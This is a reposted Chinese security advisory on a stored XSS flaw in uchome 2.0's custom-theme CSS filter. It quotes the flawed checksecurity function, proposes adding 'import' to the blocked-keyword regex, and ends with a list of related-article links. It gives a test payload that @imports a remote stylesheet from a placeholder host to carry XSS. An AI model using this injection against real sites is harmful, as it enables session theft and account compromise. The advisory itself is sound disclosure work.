uchome 2.0 存在持久XSS漏洞
发布时间:2010-09-03
影响版本:uchome 2.0
漏洞描述:看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过.
@import url(http://xxx.com/1.css); 包含远程css文件,可以在1.css中写入XSS利用.
分析代码 cp_theme.php 92行(17行调用)
function checksecurity($str) {//执行一系列的过滤验证是否合法的CSS$filter = array('//*[]*(.+?)[]**//is','/[^a-z0-9]+/i',);$str = preg_replace($filter, '', $str); //过滤是过滤了,但只用于判断,没对源输入起作用if(preg_match("/(expression|implode|javascript)/i", $str)) { //并没有对import、http等进行检测showmessage('css_contains_elements_of_insecurity');}return true;
}
安全建议:
临时解决方法:
implode应该是import的笔误
/(expression|vbscript|javascript|import)/i
转载于:https://www.cnblogs.com/52php/p/5658205.html
uchome 2.0 存在持久XSS漏洞相关推荐
- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞 --from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Q ...
- url存在宽字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0
点击上方"公众号" 可以订阅哦! Hello,各位小伙伴周五晚上好~ 终于到了XSS漏洞的完结篇啦~~ 感觉本公众号写的最多的就是XSS,现在可以告一段落了... 让我们来看看第一 ...
- xss漏洞php注射实战,利用XSS渗透DISCUZ 6.1.0实战
论坛-->入侵者布置的跨站攻击-->转移被入侵这视线(隐蔽) 论坛插入脚本: var img = new Image(); img.src = 'get_cookie.php?var=' ...
- Flash XSS 漏洞详解 根治的好办法
本文的目的是深层次的分析Flash的ExternalInterface的XSS漏洞,并提出比较有效的解决方案. 首先,我们看看什么情况下,会出现XSS. 第一种情况: 把flashvars传入的参 ...
- php的服务器变量$SERVER以及防止$_SERVER['PHP_SELF']造成的XSS漏洞攻击及其解决方案
一.背景 突然想起来之前面试的一些面试题,让我写出几个服务器变量$SERVER代表的意思..实话实说,这些东西已经忘记很久了,都是用的时候直接上网查,今天再复习复习吧. 二.$SERVER $_SER ...
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
- 反射型XSS漏洞详解
反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞.通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户.对于开发者而言,使用这种机制 ...
- 反射型XSS漏洞的条件+类型+危害+解决
XSS攻击需要具备两个条件:需要向web页面注入恶意代码:这些恶意代码能够被浏览器成功的执行. XSS攻击有2种: 反射型攻击; 存储型攻击 XSS反射型攻击,恶意代码并没有保存在目标网站, ...
- windows系统和linux系统可以使用相同的js代码吗_使用Sboxr自动发现和利用DOM(客户端)XSS漏洞...
这一系列的博客文章将向你展示如何在单页或富JavaScript的应用程序上识别DOM XSS的问题.作为示例,我们将在DOM XSS playground(https://domgo.at)上解决10 ...
- xss防御补丁_Discuz论坛最新dom xss漏洞的解决方法
无忧主机小编在日常处理客户网站问题时,经常遇到网站因为程序漏洞出现的问题.网站安全的发展,才能使得管理者放心营运.但是比较无奈的是,漏洞问题貌似屡见不鲜,就算再强大.再常用的程序,都会有诸如漏洞的问题 ...
最新文章
- python可以做什么项目-python都能做什么
- 计算机网络基础知识,仅此一篇足矣
- Linux 串口 gprs at,linux下GPRS模块使用AT命令实现拨接电话,发中英文短信
- 整型关键字的平方探测法散列 (25 分)【详细解析】
- gridview中的nbsp;问题解决方法
- 类模板 - C++快速入门45
- django:访问本地静态文件的配置
- H3CSE路由-路由策略
- 计算机接口技术 实验箱,微机原理及接口技术实验箱.doc
- ArcMap基于PG数据库创建企业级地理数据库
- html怎么拼图没有缝隙,【答疑】ps怎么拼图不留缝隙?急需答案!! - 视频教程线上学...
- nacos is starting with cluster
- PX4模块设计之二:uORB消息代理
- 第十六章: 请多一点
- 分享DB2 SQL查询性能问题一例
- TensorRT网络推理c++实现
- python open找不到文件的原因_浅谈python 调用open()打开文件时路径出错的原因
- 鸿蒙电视发布会,鸿蒙发布会:无论设备大小 只需一个系统!
- 基于GPS与经纬度距离计算
- window系统批量自动安装软件-批处理